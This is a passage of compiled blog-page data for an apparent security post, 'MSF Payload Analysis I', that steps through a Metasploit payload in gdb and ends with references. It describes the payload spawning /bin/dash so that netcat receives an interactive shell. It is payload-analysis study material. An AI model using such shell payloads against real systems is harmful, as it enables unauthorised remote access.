   \"alt\": \"sys_execue\",\n    \"title\": \"sys_execue\",\n    \"src\": \"/static/e052575c1e074157f13fc8b43c94648f/fcda8/2020-06-17_23-51.png\",\n    \"srcSet\": [\"/static/e052575c1e074157f13fc8b43c94648f/12f09/2020-06-17_23-51.png 148w\", \"/static/e052575c1e074157f13fc8b43c94648f/e4a3f/2020-06-17_23-51.png 295w\", \"/static/e052575c1e074157f13fc8b43c94648f/fcda8/2020-06-17_23-51.png 590w\", \"/static/e052575c1e074157f13fc8b43c94648f/efc66/2020-06-17_23-51.png 885w\", \"/static/e052575c1e074157f13fc8b43c94648f/d9199/2020-06-17_23-51.png 960w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n   
 \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"Check out gdb follow execution info:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \" show follow-fork-mode\"))), mdx(\"p\", null, \"Set to follow parent:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token builtin class-name\"\n  }), \"set\"), \" follow-fork-mode parent\"))), mdx(\"p\", null, \"Disable previous breakpoint:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    
\"className\": \"language-shell\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \" disable breakpoints \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token builtin class-name\"\n  }), \"continue\")))), mdx(\"p\", null, \"Continuing past the syscall launches the program /bin/dash (on Ubuntu, /bin/sh is a symbolic link to dash), and netcat gets an interactive shell.\"), mdx(\"h2\", null, \"References\"), mdx(\"p\", null, \"x86 Instruction Set: \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://c9x.me/x86/\"\n  }), \"https://c9x.me/x86/\")), mdx(\"p\", null, \"Ubuntu 16.04 Manual: \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/\"\n  }), \"https://manpages.ubuntu.com/manpages/xenial/man2/\")), mdx(\"p\", null, \"System Call Table: \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_32.tbl\"\n  }), \"https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_32.tbl\")), mdx(\"p\", null, \"Stackoverflow Question: \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://stackoverflow.com/questions/9940391/looking-for-a-detailed-document-on-linux-system-calls\"\n  }), 
\"https://stackoverflow.com/questions/9940391/looking-for-a-detailed-document-on-linux-system-calls\")));\n}\n;\nMDXContent.isMDXComponent = true;","frontmatter":{"title":"MSF Payload Analysis I","date":"June 18, 2020","description":null}}},"pageContext":{"slug":"/msf-payload-analysis-i/","previous":{"fields":{"slug":"/Vigenère-cipher-implementation/"},"frontmatter":{"title":"Vigenère cipher implementation"}},"next":{"fields":{"slug":"/raven:2-writeup/"},"frontmatter":{"title":"Raven:2 Writeup"}}}}}